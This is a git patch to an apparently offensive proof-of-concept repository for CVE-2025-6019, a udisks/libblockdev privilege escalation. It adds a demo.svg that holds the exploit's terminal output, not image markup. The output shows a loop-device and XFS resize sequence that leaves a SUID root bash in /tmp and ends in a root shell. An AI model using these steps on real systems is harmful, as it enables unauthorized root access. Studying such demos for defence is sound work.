From ebb4f93936889b06ea5ca75ad03fd6142832c89c Mon Sep 17 00:00:00 2001 From: nenandjabhata Date: Thu, 19 Jun 2025 03:14:19 +0000 Subject: [PATCH] Exploit Demo Video --- README.md | 2 +- demo.svg | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) create mode 100644 demo.svg diff --git a/README.md b/README.md index 5f2b5a6..b8cf074 100644 --- a/README.md +++ b/README.md @@ -6,7 +6,7 @@ This repository contains a Proof of Concept (PoC) script for **CVE-2025-6019**, -[![Exploit demo](https://asciinema.org/a/VyllF4IiYSe25Xf2TC9l4hu8c)](https://asciinema.org/a/VyllF4IiYSe25Xf2TC9l4hu8c) +![Exploit Demo](demo.svg) ## Features diff --git a/demo.svg b/demo.svg new file mode 100644 index 0000000..5558627 --- /dev/null +++ b/demo.svg @@ -0,0 +1 @@ +┌──(hackerctf㉿redteam)-[~]└─$└─$bash└─$bashexploit.shPoCforCVE-2025-6019(LPEvialibblockdev/udisks)WARNING:Onlyrunthisonauthorizedsystems.Unauthorizeduseisillegal.Continue?[y/N]:y[+]Alldependenciesareinstalled.[*]Checkingforvulnerablelibblockdev/udisksversions...[*]Detectedudisksversion:unknown[!]Warning:SpecificvulnerableversionsforCVE-2025-6019areunknown.[!]Verifymanuallythatthetargetsystemrunsavulnerableversionoflibblockdev/udisks.[!]ContinuingwithPoCexecution...Selectmode:[L]ocal:Create300MBXFSimage(requiresroot)[C]ible:Exploittargetsystem[L]ocalor[C]ible?(L/C):C[*]Startingexploitationontargetmachine...[*]Checkingallow_activestatus...[+]allow_activestatusconfirmed.[*]Verifyingxfs.imageintegrity...[*]Stoppinggvfs-udisks2-volume-monitor...[*]Note:gvfs-udisks2-volume-monitorwasnotrunning.[*]Settinguploopdevice...[+]Loopdeviceconfigured:/dev/loop1[*]Keepingfilesystembusytopreventunmounting...[+]Backgroundloopstarted(PID:43297)[*]Resizingfilesystemtotriggermount...[+]Mountsuccessful(expectederror:targetisbusy).[*]Waiting2secondsformounttostabilize...[*]CheckingforSUIDbashin/tmp/blockdev*...[+]SUIDbashfound:/tmp/blockdev.BWFT82/bash-rwsr-xr-x1rootroot1277936Jun1902:33/tmp/blockdev.BWFT82/bash[*]Executingrootshell...bash-5.2#bash-5.2#iduid=1002(hackerctf)gid=1002(hackerctf)euid=0(root)groups=1002(hackerctf),100(users)bash-5.2#whoamirootexit[+]Exploitationsuccessful!Rootshellobtained.[*]Backgroundloop(PID:43297)andmountleftrunningtopreserveSUIDbinary.[*]SUIDbashremainsat:/tmp/blockdev.BWFT82/bash[*]Tocleanupmanually,run:kill432972>/dev/nullsudoumount/tmp/blockdev*2>/dev/nullsudoudisksctlloop-delete--block-device/dev/loop12>/dev/nullrm-rf/tmp/blockdev*./xfs.imagegdbus_output.txt2>/dev/null└─$-rwsr-xr-x1rootroot1277936Jun1902:33/tmp/blockdev.BWFT82/bash^C└─$b└─$ba└─$bas└─$bashe└─$bashexContinue?[y/N]:[L]ocalor[C]ible?(L/C):bash-5.2#ibash-5.2#wbash-5.2#whbash-5.2#whobash-5.2#whoabash-5.2#whoam \ No newline at end of file